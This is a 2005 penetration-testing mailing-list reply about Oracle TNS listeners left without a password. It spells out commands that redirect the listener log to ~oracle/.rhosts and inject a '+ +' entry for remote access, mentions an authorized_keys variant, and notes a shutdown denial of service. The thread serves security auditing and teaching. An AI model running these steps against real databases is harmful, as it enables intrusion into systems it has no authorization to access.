Penetration Testing mailing list archives
Re: Oracle Auditing
From: Joshua Wright <jwright () hasborg com>
Date: Tue, 02 Aug 2005 21:49:55 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Joe, Joe T wrote:
When performing some network scans, I notice that the Oracle database rarely has a password set for the tnslsnr account. My question becomes: Has anyone exploited this misconfiguration, and if so - how? Is this an account that you can connect to without expensive Oracle software?
If the listener is not password protected, it's possible to change the configuration of the listener or simply shut it down to cause a DoS. To do something more devious, we can use the listener logging feature: (on the attacker's machine with a local copy of lsnrctl): eve$ lsnrctl LSNRCTL> set current_listener target_ip_or_host LSNRCTL> set log_file /home/oracle/.rhosts LSNRCTL> exit This will configure the listener to write logging information to the specified file. Next, we can use the tnscmd.pl tool to send a raw string to the victim TNS listener: eve$ tnscmd.pl -h target_ip_or_host --rawcmd "(CONNECT_DATA=(( + + " eve$ This will connect to the listener and send the string "(CONNECT_DATA=((<CR>+ +<CR>". This information gets written to the listener log file, which would produce a single line with "+ +". If the target isn't running r-services, you can use other techniques to obtain access to the remote OS. Perhaps ~oracle/.ssh/authorized_key2? Note that you can download a trial version of the Oracle database from otn.oracle.com, which would allow you to grab a copy of the lsnrctl tool. This sample hack and several other Oracle auditing, assessment and pen-test techniques are covered in the SANS Securing Oracle course. SANS is offering the Securing Oracle course at our yearly Network Security conference in New Orleans on 10/24-10/30. More information on the Securing Oracle course and the topics covered is available at http://www.sans.org/ns2005/description.php?tid=247. NB: I work for the SANS Institute, and teach the Securing Oracle class (although I'll be teaching Assessing and Securing Wireless at the Network Security conference). - -Josh - -- - -Joshua Wright jwright () hasborg com 2005-2006 pgpkey: http://802.11ninja.net/pgpkey.htm fingerprint: F00E 7A42 8375 0C55 964F E5A4 4D2F 22F6 3658 A4BF Today I stumbled across the world's largest hotspot. The SSID is "linksys". -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (MingW32) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFC8CLCTS8i9jZYpL8RAhDjAJ9oiXjl2HJaOjrGGC4GfBl6ZZKLiQCdFP3J JM9FKGY6qCIk304rh4+LxLI= =C64z -----END PGP SIGNATURE----- ------------------------------------------------------------------------------ FREE WHITE PAPER - Wireless LAN Security: What Hackers Know That You Don't Learn the hacker's secrets that compromise wireless LANs. Secure your WLAN by understanding these threats, available hacking tools and proven countermeasures. Defend your WLAN against man-in-the-Middle attacks and session hijacking, denial-of-service, rogue access points, identity thefts and MAC spoofing. Request your complimentary white paper at: http://www.securityfocus.com/sponsor/AirDefense_pen-test_050801 -------------------------------------------------------------------------------
Current thread:
- Oracle Auditing Joe T (Aug 02)
- RE: Oracle Auditing Clement Dupuis (Aug 02)
- Re: Oracle Auditing Joshua Wright (Aug 02)
- Re: Oracle Auditing DokFLeed (Aug 03)
- Re: Oracle Auditing Thor (Hammer of God) (Aug 03)
- RE: Oracle Auditing Erez (Aug 03)
- Re: Oracle Auditing David Eduardo Acosta RodrÃguez (Aug 03)
- Re: Oracle Auditing Pete Finnigan (Aug 12)